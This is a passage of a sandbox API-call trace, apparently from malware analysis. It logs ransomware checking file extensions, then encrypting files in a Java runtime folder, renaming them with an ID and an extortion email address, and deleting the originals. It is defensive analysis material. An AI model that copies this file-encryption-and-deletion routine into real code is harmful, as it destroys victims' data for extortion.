returned -1 [0198.945] lstrlenW (lpString=".7z") returned 3 [0198.945] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.945] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll") returned 51 [0198.945] lstrlenW (lpString=".dbf") returned 4 [0198.945] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll") returned 51 [0198.946] lstrlenW (lpString=".1cd") returned 4 [0198.946] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll") returned 51 [0198.946] lstrlenW (lpString=".jpg") returned 4 [0198.946] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll") returned 51 [0198.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll") returned 51 [0198.946] lstrlenW (lpString=".doc") returned 4 [0198.946] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.946] lstrlenW (lpString=".docx") returned 5 [0198.946] lstrcmpiW (lpString1=".docx", lpString2="w.dll") returned -1 [0198.946] lstrlenW (lpString=".pdf") returned 4 [0198.946] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.946] lstrlenW (lpString=".xls") returned 4 [0198.946] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.946] lstrlenW (lpString=".xlsx") returned 5 [0198.946] lstrcmpiW (lpString1=".xlsx", lpString2="w.dll") returned -1 [0198.946] lstrlenW (lpString=".ppt") returned 4 [0198.946] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll") returned 51 [0198.946] lstrlenW (lpString=".zip") returned 4 [0198.946] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.946] lstrlenW (lpString=".rar") returned 4 [0198.946] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.946] lstrlenW (lpString=".bz2") returned 4 [0198.946] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.946] lstrlenW (lpString=".7z") returned 3 [0198.946] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll") returned 51 [0198.946] lstrlenW (lpString=".dbf") returned 4 [0198.946] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll") returned 51 [0198.947] lstrlenW (lpString=".1cd") returned 4 [0198.947] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.947] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll") returned 51 [0198.947] lstrlenW (lpString=".jpg") returned 4 [0198.947] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.947] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0198.947] lstrlenW (lpString="resource.dll") returned 12 [0198.947] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\resource.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0198.947] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=15424) returned 1 [0198.947] CloseHandle (hObject=0x334) returned 1 [0198.947] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\resource.dll")) returned 0x20 [0198.947] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\resource.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0198.948] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\resource.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0198.948] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.948] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.948] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\resource.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0198.948] GetLastError () returned 0x0 [0198.948] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x3c40, lpOverlapped=0x0) returned 1 [0199.098] WriteFile (in: hFile=0x360, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x3c50, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x3c50, lpOverlapped=0x0) returned 1 [0199.099] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.099] WriteFile (in: hFile=0x360, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.099] SetEndOfFile (hFile=0x360) returned 1 [0199.099] CloseHandle (hObject=0x360) returned 1 [0199.100] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.100] SetEndOfFile (hFile=0x334) returned 1 [0199.100] CloseHandle (hObject=0x334) returned 1 [0199.100] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0199.101] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\resource.dll")) returned 1 [0199.101] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll") returned 51 [0199.101] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll") returned 51 [0199.101] lstrlenW (lpString=".doc") returned 4 [0199.101] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0199.101] lstrlenW (lpString=".docx") returned 5 [0199.101] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0199.101] lstrlenW (lpString=".pdf") returned 4 [0199.101] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0199.101] lstrlenW (lpString=".xls") returned 4 [0199.101] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0199.101] lstrlenW (lpString=".xlsx") returned 5 [0199.101] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0199.101] lstrlenW (lpString=".ppt") returned 4 [0199.101] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0199.101] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll") returned 51 [0199.101] lstrlenW (lpString=".zip") returned 4 [0199.101] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0199.101] lstrlenW (lpString=".rar") returned 4 [0199.101] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0199.101] lstrlenW (lpString=".bz2") returned 4 [0199.102] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0199.102] lstrlenW (lpString=".7z") returned 3 [0199.102] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0199.102] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll") returned 51 [0199.102] lstrlenW (lpString=".dbf") returned 4 [0199.102] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0199.102] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll") returned 51 [0199.102] lstrlenW (lpString=".1cd") returned 4 [0199.102] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0199.102] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll") returned 51 [0199.102] lstrlenW (lpString=".jpg") returned 4 [0199.102] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0199.102] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll") returned 51 [0199.102] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll") returned 51 [0199.102] lstrlenW (lpString=".doc") returned 4 [0199.102] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0199.102] lstrlenW (lpString=".docx") returned 5 [0199.102] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0199.102] lstrlenW (lpString=".pdf") returned 4 [0199.102] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0199.102] lstrlenW (lpString=".xls") returned 4 [0199.102] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0199.102] lstrlenW (lpString=".xlsx") returned 5 [0199.102] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0199.102] lstrlenW (lpString=".ppt") returned 4 [0199.102] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0199.102] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll") returned 51 [0199.102] lstrlenW (lpString=".zip") returned 4 [0199.102] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0199.102] lstrlenW (lpString=".rar") returned 4 [0199.102] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0199.103] lstrlenW (lpString=".bz2") returned 4 [0199.103] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0199.103] lstrlenW (lpString=".7z") returned 3 [0199.103] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0199.103] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll") returned 51 [0199.103] lstrlenW (lpString=".dbf") returned 4 [0199.103] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0199.103] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll") returned 51 [0199.103] lstrlenW (lpString=".1cd") returned 4 [0199.103] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0199.103] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll") returned 51 [0199.103] lstrlenW (lpString=".jpg") returned 4 [0199.103] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0199.103] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0199.103] lstrlenW (lpString="rmid.exe") returned 8 [0199.103] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmid.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0199.104] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=15936) returned 1 [0199.104] CloseHandle (hObject=0x334) returned 1 [0199.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmid.exe")) returned 0x20 [0199.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmid.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0199.104] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmid.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0199.104] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.104] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.104] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmid.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0199.105] GetLastError () returned 0x0 [0199.105] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x3e40, lpOverlapped=0x0) returned 1 [0199.154] WriteFile (in: hFile=0x360, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x3e50, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x3e50, lpOverlapped=0x0) returned 1 [0199.155] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.155] WriteFile (in: hFile=0x360, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xe4, lpOverlapped=0x0) returned 1 [0199.155] SetEndOfFile (hFile=0x360) returned 1 [0199.155] CloseHandle (hObject=0x360) returned 1 [0199.156] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.156] SetEndOfFile (hFile=0x334) returned 1 [0199.156] CloseHandle (hObject=0x334) returned 1 [0199.156] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0199.157] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmid.exe")) returned 1 [0199.157] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe") returned 47 [0199.157] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe") returned 47 [0199.157] lstrlenW (lpString=".doc") returned 4 [0199.157] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0199.157] lstrlenW (lpString=".docx") returned 5 [0199.157] lstrcmpiW (lpString1=".docx", lpString2="d.exe") returned -1 [0199.157] lstrlenW (lpString=".pdf") returned 4 [0199.157] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0199.157] lstrlenW (lpString=".xls") returned 4 [0199.157] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0199.157] lstrlenW (lpString=".xlsx") returned 5 [0199.157] lstrcmpiW (lpString1=".xlsx", lpString2="d.exe") returned -1 [0199.157] lstrlenW (lpString=".ppt") returned 4 [0199.157] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0199.157] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe") returned 47 [0199.157] lstrlenW (lpString=".zip") returned 4 [0199.157] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0199.157] lstrlenW (lpString=".rar") returned 4 [0199.157] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0199.157] lstrlenW (lpString=".bz2") returned 4 [0199.157] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0199.157] lstrlenW (lpString=".7z") returned 3 [0199.157] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0199.157] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe") returned 47 [0199.157] lstrlenW (lpString=".dbf") returned 4 [0199.158] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0199.158] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe") returned 47 [0199.158] lstrlenW (lpString=".1cd") returned 4 [0199.158] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0199.158] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe") returned 47 [0199.158] lstrlenW (lpString=".jpg") returned 4 [0199.158] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0199.158] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe") returned 47 [0199.158] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe") returned 47 [0199.158] lstrlenW (lpString=".doc") returned 4 [0199.158] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0199.158] lstrlenW (lpString=".docx") returned 5 [0199.158] lstrcmpiW (lpString1=".docx", lpString2="d.exe") returned -1 [0199.158] lstrlenW (lpString=".pdf") returned 4 [0199.158] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0199.158] lstrlenW (lpString=".xls") returned 4 [0199.158] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0199.158] lstrlenW (lpString=".xlsx") returned 5 [0199.158] lstrcmpiW (lpString1=".xlsx", lpString2="d.exe") returned -1 [0199.158] lstrlenW (lpString=".ppt") returned 4 [0199.158] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0199.158] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe") returned 47 [0199.158] lstrlenW (lpString=".zip") returned 4 [0199.158] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0199.158] lstrlenW (lpString=".rar") returned 4 [0199.158] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0199.158] lstrlenW (lpString=".bz2") returned 4 [0199.158] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0199.159] lstrlenW (lpString=".7z") returned 3 [0199.159] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0199.159] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe") returned 47 [0199.159] lstrlenW (lpString=".dbf") returned 4 [0199.159] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0199.159] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe") returned 47 [0199.159] lstrlenW (lpString=".1cd") returned 4 [0199.159] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0199.159] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe") returned 47 [0199.159] lstrlenW (lpString=".jpg") returned 4 [0199.159] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0199.159] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0199.159] lstrlenW (lpString="rmiregistry.exe") returned 15 [0199.159] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmiregistry.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0199.160] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=16448) returned 1 [0199.160] CloseHandle (hObject=0x334) returned 1 [0199.160] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmiregistry.exe")) returned 0x20 [0199.160] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmiregistry.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0199.160] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmiregistry.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0199.160] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.160] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.160] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmiregistry.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0199.161] GetLastError () returned 0x0 [0199.161] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x4040, lpOverlapped=0x0) returned 1 [0199.241] WriteFile (in: hFile=0x360, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x4050, lpOverlapped=0x0) returned 1 [0199.242] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.242] WriteFile (in: hFile=0x360, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xf2, lpOverlapped=0x0) returned 1 [0199.242] SetEndOfFile (hFile=0x360) returned 1 [0199.243] CloseHandle (hObject=0x360) returned 1 [0199.243] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.243] SetEndOfFile (hFile=0x334) returned 1 [0199.244] CloseHandle (hObject=0x334) returned 1 [0199.244] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0199.244] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmiregistry.exe")) returned 1 [0199.244] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe") returned 54 [0199.244] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe") returned 54 [0199.244] lstrlenW (lpString=".doc") returned 4 [0199.244] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0199.244] lstrlenW (lpString=".docx") returned 5 [0199.244] lstrcmpiW (lpString1=".docx", lpString2="y.exe") returned -1 [0199.244] lstrlenW (lpString=".pdf") returned 4 [0199.245] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0199.245] lstrlenW (lpString=".xls") returned 4 [0199.245] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0199.245] lstrlenW (lpString=".xlsx") returned 5 [0199.245] lstrcmpiW (lpString1=".xlsx", lpString2="y.exe") returned -1 [0199.245] lstrlenW (lpString=".ppt") returned 4 [0199.245] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0199.245] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe") returned 54 [0199.245] lstrlenW (lpString=".zip") returned 4 [0199.245] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0199.245] lstrlenW (lpString=".rar") returned 4 [0199.245] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0199.245] lstrlenW (lpString=".bz2") returned 4 [0199.245] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0199.245] lstrlenW (lpString=".7z") returned 3 [0199.245] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0199.245] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe") returned 54 [0199.245] lstrlenW (lpString=".dbf") returned 4 [0199.245] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0199.245] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe") returned 54 [0199.245] lstrlenW (lpString=".1cd") returned 4 [0199.245] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0199.245] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe") returned 54 [0199.245] lstrlenW (lpString=".jpg") returned 4 [0199.245] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0199.245] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe") returned 54 [0199.245] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe") returned 54 [0199.245] lstrlenW (lpString=".doc") returned 4 [0199.245] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0199.245] lstrlenW (lpString=".docx") returned 5 [0199.245] lstrcmpiW (lpString1=".docx", lpString2="y.exe") returned -1 [0199.245] lstrlenW (lpString=".pdf") returned 4 [0199.245] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0199.245] lstrlenW (lpString=".xls") returned 4 [0199.245] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0199.245] lstrlenW (lpString=".xlsx") returned 5 [0199.246] lstrcmpiW (lpString1=".xlsx", lpString2="y.exe") returned -1 [0199.246] lstrlenW (lpString=".ppt") returned 4 [0199.246] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0199.246] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe") returned 54 [0199.246] lstrlenW (lpString=".zip") returned 4 [0199.246] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0199.246] 